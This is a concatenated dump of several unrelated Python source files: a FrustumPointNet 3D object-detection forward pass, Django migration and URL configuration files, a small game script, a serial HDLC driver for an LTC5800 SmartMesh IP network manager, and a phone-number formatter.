        # :param return_preds: if True, forward() also returns raw predictions
        super(FrustumPointNet, self).__init__()
        self.n_classes = n_classes
        self.n_channel = n_channel
        self.return_preds = return_preds
        self.instance_seg_net = InstanceSegNet(self.n_classes, self.n_channel)
        self.t_net = TNet(self.n_classes)
        self.bbox_net = BBoxNet(self.n_classes)
        self.FPNLoss = FrustumPointNetLoss()
    def forward(self, data_dicts):
        """Run the full pipeline on one batch.

        :param data_dicts: dict with keys 'id', 'point_cloud', 'one_hot',
            'seg', 'box3d_center', 'size_class', 'size_residual',
            'angle_class', 'angle_residual'
        :return: (losses, metrics) or (losses, metrics, preds) when
            return_preds is True
        """
        img_id = data_dicts.get("id")
        point_cloud = data_dicts.get('point_cloud')
        # Drop extra channels (e.g. reflectance) beyond n_channel.
        point_cloud = point_cloud[:, :self.n_channel, :]
        one_hot = data_dicts.get('one_hot')
        bs = point_cloud.shape[0]
        seg_label = data_dicts.get('seg')
        box3d_center_label = data_dicts.get('box3d_center')
        size_class_label = data_dicts.get('size_class')
        size_residual_label = data_dicts.get('size_residual')
        heading_class_label = data_dicts.get('angle_class')
        heading_residual_label = data_dicts.get('angle_residual')
        # 3D Instance Segmentation PointNet
        logits = self.instance_seg_net(point_cloud, one_hot)
        # Mask Point Centroid
        object_pts_xyz, mask_xyz_mean, mask = \
            point_cloud_masking(point_cloud, logits)
        # T-Net
        object_pts_xyz = object_pts_xyz.cuda()
        center_delta = self.t_net(object_pts_xyz,one_hot)
        stage1_center = center_delta + mask_xyz_mean
        # Re-center the object points on the T-Net prediction.
        object_pts_xyz_new = object_pts_xyz - \
                    center_delta.view(center_delta.shape[0],-1,1).repeat(1,1,object_pts_xyz.shape[-1])
        # 3D Box Estimation
        box_pred = self.bbox_net(object_pts_xyz_new, one_hot)
        center_boxnet, \
        heading_scores, heading_residual_normalized, heading_residual, \
        size_scores, size_residual_normalized, size_residual = \
            parse_output_to_tensors(box_pred, logits, mask, stage1_center)
        # Final center = box-net residual on top of the T-Net center.
        box3d_center = center_boxnet + stage1_center
        # Calculate loss values
        losses = self.FPNLoss(logits, seg_label, \
                box3d_center, box3d_center_label, stage1_center, \
                heading_scores, heading_residual_normalized, \
                heading_residual, \
                heading_class_label, heading_residual_label, \
                size_scores, size_residual_normalized, \
                size_residual, \
                size_class_label, size_residual_label)
        # Normalize losses to per-sample values.
        for key in losses.keys():
            losses[key] = losses[key]/bs
        with torch.no_grad():
            seg_correct = torch.argmax(logits.detach().cpu(), 2).eq(seg_label.detach().cpu()).numpy()
            # NOTE(review): divides by n points only (not batch * n) -
            # confirm whether this is the intended accuracy normalization.
            seg_accuracy = np.sum(seg_correct) / float(point_cloud.shape[-1])
            # Calculate the top-view and 3D box IOU for the boxes
            iou2ds, iou3ds = compute_box3d_iou( \
                box3d_center.detach().cpu().numpy(),
                heading_scores.detach().cpu().numpy(),
                heading_residual.detach().cpu().numpy(),
                size_scores.detach().cpu().numpy(),
                size_residual.detach().cpu().numpy(),
                box3d_center_label.detach().cpu().numpy(),
                heading_class_label.detach().cpu().numpy(),
                heading_residual_label.detach().cpu().numpy(),
                size_class_label.detach().cpu().numpy(),
                size_residual_label.detach().cpu().numpy())
        metrics = {
            'seg_acc': seg_accuracy,
            'iou2d': iou2ds.mean(),
            'iou3d': iou3ds.mean(),
            'iou3d_0.5': np.sum(iou3ds >= 0.5) / bs,
            'iou3d_0.7': np.sum(iou3ds >= 0.7) / bs
        }
        if self.return_preds:
            preds = {
                "img_id": img_id,
                "box3d_center": box3d_center.detach().cpu().numpy(),
                "heading_scores": heading_scores.detach().cpu().numpy(),
                "heading_residual": heading_residual.detach().cpu().numpy(),
                "size_scores": size_scores.detach().cpu().numpy(),
                "size_residual": size_residual.detach().cpu().numpy(),
                "box3d_center_label": box3d_center_label.detach().cpu().numpy(),
                "heading_class_label": heading_class_label.detach().cpu().numpy(),
                "heading_residual_label": heading_residual_label.detach().cpu().numpy(),
                "size_class_label": size_class_label.detach().cpu().numpy(),
                "size_residual_label": size_residual_label.detach().cpu().numpy()
            }
            return losses, metrics, preds
        else:
            return losses, metrics
|
992,195 | 4711ecaea8167651534033c86eda87f8fa0b51cb | # Generated by Django 2.2.7 on 2019-12-02 10:50
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 2.2.7 (makemigrations); prefer creating a
    # new migration over hand-editing this one.
    dependencies = [
        ('needs', '0010_auto_20191202_1201'),
    ]
    # Makes the begin/end dates nullable and the creation date
    # auto-populated on insert.
    operations = [
        migrations.AlterField(
            model_name='needs',
            name='needsBeginTime',
            field=models.DateField(null=True, verbose_name='开工时间'),
        ),
        migrations.AlterField(
            model_name='needs',
            name='needsEndTime',
            field=models.DateField(null=True, verbose_name='截止时间'),
        ),
        migrations.AlterField(
            model_name='needs',
            name='needsTime',
            field=models.DateField(auto_now_add=True, verbose_name='需求创建时间'),
        ),
    ]
|
992,196 | 87d302bb672b9459e05e850895de0593f502197a | """cac URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf import settings
from django.contrib.auth import views as auth_views
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path
from articulateworks import views as articulate_views
urlpatterns = [
    path('logout/', auth_views.LogoutView.as_view(template_name='articulateworks/logout.html'), name='logout'),
    path('admin/', admin.site.urls),
    path('', articulate_views.index, name='index'),
    path('proposals/', articulate_views.get_proposals, name='proposals'),
    path('applications/', articulate_views.get_applications, name='applications'),
    path('contracts/', articulate_views.get_contracts, name='contracts'),
    path('addneeds/', articulate_views.add_needs, name='addneeds'),
    # NOTE(review): 'collaborators' and 'partners' both route to
    # get_applicants - confirm this is intentional.
    path('collaborators/', articulate_views.get_applicants, name='collaborators'),
    path('partners/', articulate_views.get_applicants, name='partners'),
    path('newapplication/', articulate_views.send_application, name='newapplication'),
    path('addrole/', articulate_views.add_role, name='addrole'),
    # NOTE(review): 'addtask' and 'addskill' also point at add_role -
    # looks like a copy-paste slip (expected add_task / add_skill?);
    # verify against the views module.
    path('addtask/', articulate_views.add_role, name='addtask'),
    path('addskill/', articulate_views.add_role, name='addskill'),
    # path('applicantskills/', articulate_views.get_userskills_available, name='userskills_list'),
    path('applicantskills/', articulate_views.ApplicantSkillsListView.as_view(), name='userskills_list'),
    path('paypal_openid_login/', articulate_views.paypal_openid_login, name='paypal_openid_login'),
    path('paypal_openid_auth/', articulate_views.paypal_openid_auth, name='paypal_openid_auth'),
    path('merchant_payment_failure/', articulate_views.merchant_payment_failure, name='merchant_payment_failure'),
    path('merchant_payment_success/', articulate_views.merchant_payment_success, name='merchant_payment_success')
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
# Mount the debug toolbar only in development builds.
if settings.DEBUG:
    import debug_toolbar
    urlpatterns = [
        url(r'^__debug__/', include(debug_toolbar.urls)),
    ] + urlpatterns
992,197 | 6c6f03c6f8f386bf2b51cbe8595c48d1fe62c447 | from Game import Game, getch
import random
def main():
    """Play random moves until the board total is exactly 8.

    Random moves raise the total; 'undo' walks it back down whenever we
    overshoot, looping until get_sum() lands on 8 exactly.
    """
    session = Game()
    session.new_game()
    directions = ['up', 'left', 'down', 'right']
    while session.get_sum() != 8:
        while session.get_sum() < 8:
            session.play_move(random.choice(directions))
        while session.get_sum() > 8:
            session.play_move('undo')
if __name__ == "__main__":
main()
|
992,198 | 58bcc7743e533d49b1873cf000bc0a484900d9dc | import HDLC_communication
import struct
import time
import helpers
LTC5800IPR_PROTOCOL_VERSION = 4
RC_OK = 0
RC_INVALID_COMMAND = 1
RC_INVALID_ARGUMENT = 2
RC_END_OF_LIST = 11
RC_NO_RESOURCES = 12
RC_IN_PROGRESS = 13
RC_NACK = 14
RC_WRITE_FAIL = 15
RC_VALIDATION_ERROR = 16
RC_INV_STATE = 17
RC_NOT_FOUND = 18
RC_UNSUPPORTED = 19
MOTE_STATE_LOST = 0
MOTE_STATE_NEGOTIATING = 1
MOTE_STATE_OPERATIONAL = 4
SMIP_MAX_PAYLOAD_TO_MANAGER = 90
class class_Dongle_Communication(HDLC_communication.class_HDLC_Communication):
def __init__(self,
comm_port,
callback_command_resp=None, # response for commands
callback_notif_event=None, # notification.events
callback_notif_log=None, # notification.logs
callback_notif_data=None, # notifications.data - here data from mote should be processed
callback_notif_ipData=None, # notification.ipData - here data from mote using ipv6 should be processed
callback_notif_healthReport=None, # notification.health RawDataSensors
callback_MgrHello=None, # when manager disconnects from us and waiting for ClientHello message (is_active_session -> False)
callback_HelloResponse=None, # when manager connects us and waiting for further messages from us (is_active_session -> True)
callback_serial_comm_open=None, # serial COM port is now open
callback_serial_comm_close=None): # serial COM port is now closed
HDLC_communication.class_HDLC_Communication.__init__(
self=self,
comm_port=comm_port,
callback_process_message=self.__process_message__,
callback_serial_comm_open=self.__on_serial_comm_open__,
callback_serial_comm_close=self.__on_serial_comm_close__
)
self.callback_command_resp = callback_command_resp
self.callback_serial_comm_open = callback_serial_comm_open
self.callback_serial_comm_close = callback_serial_comm_close
self.callback_notif_event = callback_notif_event
self.callback_notif_log = callback_notif_log
self.callback_notif_data = callback_notif_data
self.callback_notif_ipData = callback_notif_ipData
self.callback_notif_healthReport = callback_notif_healthReport
self.callback_MgrHello = callback_MgrHello
self.callback_HelloResponse = callback_HelloResponse
self.in_active_session = False
self.MgrHelloCounter = 0 # up counter to decide when to send clientHello again
self.mgrSeqNo = 0 # manager sequence number as received in HelloResponse packet, and by acknowledged messages that the manager sends us
self.cliSeqNo = 0 # iComox sequence number sent in Hello message, and in iComox request messages
self.seqNumber = 0 # contains the sequence number of the packet that was acknowledged. write_to_manager() checks it when it waits for response for messages that need to get ACK
# manage the mechanism to send messages that requires returned ACK responses, again and again
self.write_attempts = 0
self.latest_time_for_ack_to_arrive = 0
self.msg_requires_ack = bytearray()
def __on_serial_comm_open__(self, comm):
helpers.OUT("LTC5800IPR.__on_serial_comm_open__")
self.in_active_session = False
self.MgrHelloCounter = 0
if callable(self.callback_serial_comm_open):
self.callback_serial_comm_open(self)
self.send_ClientHello()
def __on_serial_comm_close__(self, comm):
helpers.OUT("LTC5800IPR.__on_serial_comm_close__")
self.in_active_session = False
self.MgrHelloCounter = 0
if callable(self.callback_serial_comm_close):
self.callback_serial_comm_close(self)
def __process_message__(self, comm, msg):
# helpers.OUT("LTC5800IPR.__process_message__")
if len(msg) < 4:
return
control, packetType, seqNumber, payloadLen = struct.unpack("BBBB", msg[:4])
if (control & 1) != 0: # iComox received ack packet
# helpers.OUT("LTC5800IPR: ACK packet received")
if (control & 2) != 0: # iComox previously requested ACK
if seqNumber == self.seqNumber:
return # ignore the packet
else:
self.seqNumber = seqNumber # store the new incoming sequence number and process the message
else: # iComox previously did not request ACK
pass
else: # iComox received data packet (probably notification)
if (control & 2) != 0: # manager requires ACK
self.write_to_manager(packetType=packetType, AckPacket=True, serviceTypeAck=True) # send ACK to the received message
else: # manager requires no ACK
pass
# if (control & 1) != 0: # dongle application received ack packet
# # helpers.OUT("LTC5800IPR: ACK packet received")
# if (control & 2) != 0: # dongle application previously requested ACK
# if seqNumber != self.cliSeqNo:
# self.send_ClientHello(cliSeqNo=0xFF)
# return
# else:
# pass
# else: # dongle application previously did not request ACK
# pass
# else: # dongle application received data packet (probably notification)
# if (control & 2) != 0: # manager requires ACK
# self.write_to_manager(packetType=packetType, AckPacket=True, serviceTypeAck=True) # send ACK to the received message
# if seqNumber == self.seqNumber: # if duplicated packet
# return # ignore the packet
# else:
# self.seqNumber = seqNumber # store the new incoming sequence number and process the message
# else: # manager requires no ACK
# pass
payload = msg[4:]
if packetType == 0x14: # notifications which can be events
# helpers.OUT("LTC5800IPR.notification received")
if (payloadLen > 124) or (len(msg) != payloadLen + 4):
return
if len(payload) < 1:
return
notifType = payload[0]
if notifType == 1: # Event notification
if len(payload) < 6:
return
if callable(self.callback_notif_event):
eventId, eventType = struct.unpack_from(">LB", payload[:6], 1)
eventData = payload[6:]
self.callback_notif_event(self, eventId, eventType, eventData)
elif notifType == 2: # Log notification
if len(payload) < 9:
return
if callable(self.callback_notif_log):
macAddress = payload[1:9]
logMsg = payload[9:]
self.callback_notif_log(self, macAddress, logMsg)
elif notifType == 4: # Data payload notification
if len(payload) < 25:
return
if callable(self.callback_notif_data):
timestamp = payload[1:13]
macAddress = payload[13:21]
srcPort, dstPort = struct.unpack_from(">HH", payload[:25], 21)
data = payload[25:]
self.callback_notif_data(self, timestamp, macAddress, srcPort, dstPort, data)
elif notifType == 5: # 6lowpan packet notification
if len(payload) < 21:
return
if callable(self.callback_notif_ipData):
timestamp = payload[1:13]
macAddress = payload[13:21]
data = payload[21:]
self.callback_notif_ipData(self, timestamp, macAddress, data)
elif notifType == 6: # Health report notification
if len(payload) < 9:
return
if callable(self.callback_notif_healthReport):
macAddress = payload[1:9]
data = payload[9:]
self.callback_notif_healthReport(self, macAddress, data)
else:
return
elif packetType == 2: # Hello response
helpers.OUT("LTC5800IPR.HelloResponse")
if len(payload) < 5:
return
RC, version, self.mgrSeqNo, self.cliSeqNo, mode = struct.unpack("BBBBB", payload[:5])
if RC == 0:
self.in_active_session = True
self.MgrHelloCounter = 0
if callable(self.callback_HelloResponse):
self.callback_HelloResponse(self, RC, version, mode)
else:
self.send_ClientHello(self)
elif packetType == 3: # MgrHello
helpers.OUT("LTC5800IPR.MgrHello")
self.in_active_session = False
self.MgrHelloCounter += 1
if callable(self.callback_MgrHello):
self.callback_MgrHello(self, self.MgrHelloCounter)
# self.send_ClientHello()
else:
if (len(payload) == 0) or (payloadLen > 124) or (len(msg) != payloadLen + 4): # The RC field is not included in the payloadLen????
helpers.OUT("__process_message__(): Illegal payload field, or payload does not contain RC field")
return # illegal payloadLen field, or payload does not contain the RC field
if callable(self.callback_command_resp):
RC = payload[0]
if len(payload) < 2:
data = bytearray()
else:
data = payload[1:]
self.callback_command_resp(self, packetType, RC, data)
    def write_service_type_ack_msg_to_manager(self):
        """(Re)send the pending ACK-requiring message to the manager.

        Consumes one attempt from self.write_attempts and arms the retry
        deadline; when the attempts are exhausted, restarts the session
        handshake with ClientHello (cliSeqNo reset to 0) and reports
        failure. A failed HDLC write closes the serial port.

        :return: True if the HDLC write succeeded, False otherwise
        """
        if self.write_attempts > 0:
            self.write_attempts -= 1
            # Retry window: expect the ACK within 200 ms.
            self.latest_time_for_ack_to_arrive = time.monotonic() + 0.2 # 200 msec before trying again
            result = self.write_hdlc_msg(msg=self.msg_requires_ack)
            if not result:
                self.write_attempts = 0
                self.close()
        else:
            # Out of attempts: restart the handshake from scratch.
            self.send_ClientHello(cliSeqNo=0)
            result = False
        return result
    def write_to_manager(self, packetType, payload=bytearray(), AckPacket=False, serviceTypeAck=True):
        """Frame and send one packet to the manager.

        Builds the 4-byte header [control, packetType, seqNo, len] + payload.
        Control bit 0 marks an ACK packet; bit 1 marks the acknowledged
        service type. For acknowledged outgoing requests the client
        sequence number is incremented (mod 256); for ACK replies the
        manager's sequence number is echoed.

        NOTE(review): the mutable default `payload=bytearray()` is safe
        here only because payload is never mutated in this method.

        :return: result of the underlying HDLC write (True/False)
        """
        Control = 0
        if AckPacket:
            Control |= 1
        if serviceTypeAck:
            Control |= 2
        if serviceTypeAck:
            if AckPacket:
                # Echo the manager's sequence number when acknowledging.
                seqNo = self.mgrSeqNo
            else:
                # New acknowledged request: bump our sequence number.
                self.cliSeqNo = (self.cliSeqNo + 1) % 256
                seqNo = self.cliSeqNo
        else:
            seqNo = 0
        msg = bytearray([Control, packetType, seqNo, len(payload)]) + payload
        if serviceTypeAck:
            # Stash the frame so the retry machinery can resend it until
            # the manager acknowledges.
            self.msg_requires_ack = msg
            self.write_attempts = 1
            return self.write_service_type_ack_msg_to_manager()
        else:
            return self.write_hdlc_msg(msg=msg)
    def send_ClientHello(self, cliSeqNo=None):
        """Send the ClientHello handshake packet (packetType 0x01).

        :param cliSeqNo: optional override for the client sequence number
            before the Hello is built; None keeps the current value
        :return: result of the underlying write (True/False)
        """
        helpers.OUT("ClientHello")
        if cliSeqNo is not None:
            self.cliSeqNo = cliSeqNo
        # Payload: protocol version, client sequence number, mode (0).
        payload = bytearray(struct.pack("BBB", LTC5800IPR_PROTOCOL_VERSION, self.cliSeqNo, 0))
        return self.write_to_manager(packetType=0x01, payload=payload, serviceTypeAck=False)
def send_resetSystem(self, serviceTypeAck=True):
helpers.OUT("resetSystem")
return self.write_to_manager(packetType=0x15, payload=bytearray(b"\x00\x00\x00\x00\x00\x00\x00\x00\x00"), serviceTypeAck=serviceTypeAck)
def send_resetMote(self, macAddress, serviceTypeAck=True):
helpers.OUT("resetMote")
payload = bytearray(b"\x02") + macAddress
return self.write_to_manager(packetType=0x15, payload=payload, serviceTypeAck=serviceTypeAck)
def send_subscribe(self, filter, unackFilter, serviceTypeAck=True):
helpers.OUT("subscribe")
payload = bytearray(struct.pack(">LL", filter, unackFilter))
return self.write_to_manager(packetType=0x16, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getTime(self, serviceTypeAck=True):
helpers.OUT("getTime")
return self.write_to_manager(packetType=0x17, payload=bytearray(), serviceTypeAck=serviceTypeAck)
def send_setNetworkConfig(self, networkID, apTxPower, frameProfile, maxMotes, baseBandwidth, downFrameMultVal, numParents, ccaMode, channelList, bbMode, bbSize, isRadioTest, bwMult, oneChannel, serviceTypeAck=False):
helpers.OUT("setNetworkConfig")
payload = bytearray(struct.pack(">HbBHHBBBHBBBHB", networkID, apTxPower, frameProfile, maxMotes, baseBandwidth, downFrameMultVal, numParents, ccaMode, channelList, bbMode, bbSize, isRadioTest, bwMult, oneChannel))
return self.write_to_manager(packetType=0x1A, payload=payload, serviceTypeAck=serviceTypeAck)
def send_clearStatistics(self, serviceTypeAck=True):
helpers.OUT("clearStatistics")
return self.write_to_manager(packetType=0x1F, payload=bytearray(), serviceTypeAck=serviceTypeAck)
def send_exchangeMoteJoinKey(self, macAddress, key, serviceTypeAck=True):
helpers.OUT("exchangeMoteJoinKey")
payload = macAddress + key
return self.write_to_manager(packetType=0x21, payload=payload, serviceTypeAck=serviceTypeAck)
def send_exchangeNetworkId(self, id, serviceTypeAck=True):
helpers.OUT("exchangeNetworkId")
return self.write_to_manager(packetType=0x22, payload=bytearray([id]), serviceTypeAck=serviceTypeAck)
def send_radiotestTx(self, testType, chanMask, repeatCnt, txPower, seqSize, sequenceDef, stationId, serviceTypeAck=True):
helpers.OUT("radiotestTx")
assert(len(sequenceDef) <= 10)
payload = bytearray(struct.pack(">BHHbB", testType, chanMask, repeatCnt, txPower, seqSize))
for seqDef in sequenceDef:
payload += bytearray(struct.pack(">BH", seqDef.pkLen, seqDef.delay))
payload += bytearray([stationId])
return self.write_to_manager(packetType=0x23, payload=payload, serviceTypeAck=serviceTypeAck)
def send_radiotestRx(self, mask, duration, stationId, serviceTypeAck=True):
helpers.OUT("radiotestRx")
payload = bytearray(struct.pack(">HHB", mask, duration, stationId))
return self.write_to_manager(packetType=0x25, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getRadiotestStatistics(self, serviceTypeAck=True):
helpers.OUT("getRadiotestStatistics")
return self.write_to_manager(packetType=0x26, payload=bytearray(), serviceTypeAck=serviceTypeAck)
def send_setACLEntry(self, macAddress, joinKey, serviceTypeAck=True):
helpers.OUT("setACLEntry")
payload = bytearray(macAddress) + bytearray(joinKey)
return self.write_to_manager(packetType=0x27, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getNextACLEntry(self, macAddress, serviceTypeAck=True):
helpers.OUT("getNextACLEntry")
payload = bytearray(macAddress)
return self.write_to_manager(packetType=0x28, payload=payload, serviceTypeAck=serviceTypeAck)
def send_deleteACLEntry(self, macAddress, serviceTypeAck=True):
helpers.OUT("deleteACLEntry")
payload = bytearray(macAddress)
return self.write_to_manager(packetType=0x29, payload=payload, serviceTypeAck=serviceTypeAck)
def send_pingMote(self, macAddress, serviceTypeAck=True):
helpers.OUT("pingMote")
payload = bytearray(macAddress)
return self.write_to_manager(packetType=0x2A, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getLog(self, macAddress, serviceTypeAck=True):
helpers.OUT("getLog")
payload = bytearray(macAddress)
return self.write_to_manager(packetType=0x2B, payload=payload, serviceTypeAck=serviceTypeAck)
def send_sendData(self, macAddress, priority, srcPort, dstPort, data, serviceTypeAck=True):
helpers.OUT("sendData")
payload = bytearray(macAddress) + bytearray(struct.pack(">BHHB", priority, srcPort, dstPort, 0)) + bytearray(data)
return self.write_to_manager(packetType=0x2C, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getSystemInfo(self, serviceTypeAck=True):
helpers.OUT("getSystemInfo")
return self.write_to_manager(packetType=0x2E, payload=bytearray(), serviceTypeAck=serviceTypeAck)
def send_getMoteConfig(self, macAddress, next, serviceTypeAck=True):
helpers.OUT("Send getMoteConfig() to {}".format(helpers.u8s_to_str(macAddress, ":", "")))
payload = bytearray(macAddress) + bytearray([next])
return self.write_to_manager(packetType=0x2F, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getPathInfo(self, sourceMacAddress, destMacAddress, serviceTypeAck=True):
helpers.OUT("getPathInfo")
payload = bytearray(sourceMacAddress) + bytearray(destMacAddress)
return self.write_to_manager(packetType=0x30, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getNextPathInfo(self, macAddress, filter, pathId, serviceTypeAck=True):
helpers.OUT("getNextPathInfo")
payload = bytearray(macAddress) + bytearray(struct.pack(">BH", filter, pathId))
return self.write_to_manager(packetType=0x31, payload=payload, serviceTypeAck=serviceTypeAck)
def send_setAdvertising(self, activate, serviceTypeAck=True):
helpers.OUT("setAdvertising")
payload = bytearray([activate])
return self.write_to_manager(packetType=0x32, payload=payload, serviceTypeAck=serviceTypeAck)
def send_setDownstreamFrameMode(self, frameMode, serviceTypeAck=True):
helpers.OUT("setDownstreamFrameMode")
payload = bytearray([frameMode])
return self.write_to_manager(packetType=0x33, payload=payload, serviceTypeAck=serviceTypeAck)
def send_getManagerStatistics(self, serviceTypeAck=True):
helpers.OUT("getManagerStatistics")
return self.write_to_manager(packetType=0x35, payload=bytearray(), serviceTypeAck=serviceTypeAck)
def send_setTime(self, trigger, utcTime, serviceTypeAck=True):
helpers.OUT("setTime")
payload = bytearray([trigger]) + bytearray(utcTime)
return self.write_to_manager(packetType=0x36, payload=payload, serviceTypeAck=serviceTypeAck)
def send_setCLIUser(self, role, password, serviceTypeAck=True):
helpers.OUT("setCLIUser")
payload = bytearray([role]) + bytearray(password)
return self.write_to_manager(packetType=0x3A, payload=payload, serviceTypeAck=serviceTypeAck)
def send_sendIP(self, macAddress, priority, options, encryptedOffset, data, serviceTypeAck=True):
    """Issue the sendIP request (API command 0x3B).

    Payload: MAC address, then ``priority``/``options``/``encryptedOffset``
    packed as three unsigned bytes, then the raw ``data`` bytes.
    """
    helpers.OUT("sendIP")
    frame = bytearray(macAddress)
    frame += struct.pack(">BBB", priority, options, encryptedOffset)
    frame += bytearray(data)
    return self.write_to_manager(packetType=0x3B, payload=frame, serviceTypeAck=serviceTypeAck)
def send_restoreFactoryDefaults(self, serviceTypeAck=True):
    """Issue the restoreFactoryDefaults request (API command 0x3D, no payload)."""
    helpers.OUT("restoreFactoryDefaults")
    return self.write_to_manager(serviceTypeAck=serviceTypeAck,
                                 payload=bytearray(),
                                 packetType=0x3D)
def send_getMoteInfo(self, macAddress, serviceTypeAck=True):
    """Issue the getMoteInfo request (API command 0x3E).

    The payload is the MAC address alone.
    """
    helpers.OUT("getMoteInfo")
    return self.write_to_manager(packetType=0x3E,
                                 payload=bytearray(macAddress),
                                 serviceTypeAck=serviceTypeAck)
def send_getNetworkConfig(self, serviceTypeAck=True):
    """Issue the getNetworkConfig request (API command 0x3F, no payload)."""
    helpers.OUT("getNetworkConfig")
    empty = bytearray()
    return self.write_to_manager(packetType=0x3F, payload=empty, serviceTypeAck=serviceTypeAck)
def send_getNetworkInfo(self, serviceTypeAck=True):
    """Issue the getNetworkInfo request (API command 0x40, no payload)."""
    # Fixed log-message typo: was "getNetoworkInfo".
    helpers.OUT("getNetworkInfo")
    return self.write_to_manager(packetType=0x40, payload=bytearray(), serviceTypeAck=serviceTypeAck)
def send_getMoteConfigById(self, moteId, serviceTypeAck=True):
    """Issue the getMoteConfigById request (API command 0x41).

    The payload is ``moteId`` packed as a big-endian 16-bit unsigned integer.
    """
    helpers.OUT("getMoteConfigById")
    request = bytearray(struct.pack(">H", moteId))
    return self.write_to_manager(packetType=0x41, payload=request, serviceTypeAck=serviceTypeAck)
def send_setCommonJoinKey(self, key, serviceTypeAck=False):
    """Issue the setCommonJoinKey request (API command 0x42).

    The payload is the join key bytes. NOTE(review): unlike the other
    send_* wrappers, ``serviceTypeAck`` defaults to False here — presumably
    deliberate; confirm against the manager API before changing.
    """
    helpers.OUT("setCommonJoinKey")
    return self.write_to_manager(packetType=0x42,
                                 payload=bytearray(key),
                                 serviceTypeAck=serviceTypeAck)
def send_getIPConfig(self, serviceTypeAck=True):
    """Issue the getIPConfig request (API command 0x43, no payload)."""
    helpers.OUT("getIPConfig")
    return self.write_to_manager(serviceTypeAck=serviceTypeAck,
                                 payload=bytearray(),
                                 packetType=0x43)
def send_setIPConfig(self, ipv6Address, mask, serviceTypeAck=True):
    """Issue the setIPConfig request (API command 0x44).

    Payload: the IPv6 address bytes followed by the mask bytes.
    """
    helpers.OUT("setIPConfig")
    request = bytearray(ipv6Address)
    request += bytearray(mask)
    return self.write_to_manager(packetType=0x44, payload=request, serviceTypeAck=serviceTypeAck)
def send_deleteMote(self, macAddress, serviceTypeAck=True):
    """Issue the deleteMote request (API command 0x45).

    The payload is the MAC address of the mote to delete.
    """
    helpers.OUT("deleteMote")
    return self.write_to_manager(packetType=0x45,
                                 payload=bytearray(macAddress),
                                 serviceTypeAck=serviceTypeAck)
def send_getMoteLinks(self, macAddress, idx, serviceTypeAck=True):
    """Issue the getMoteLinks request (API command 0x46).

    Payload: MAC address followed by ``idx`` as a big-endian 16-bit
    unsigned integer.
    """
    helpers.OUT("getMoteLinks")
    request = bytearray(macAddress)
    request += struct.pack(">H", idx)
    return self.write_to_manager(packetType=0x46, payload=request, serviceTypeAck=serviceTypeAck)
|
992,199 | 70839af7463a5fdb732e656b087202301495a2f5 |
phone = input("Please enter a 10 digit number: ")
print(phone[0:3] + '-' + phone[3:6] + '-' + phone[6:])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.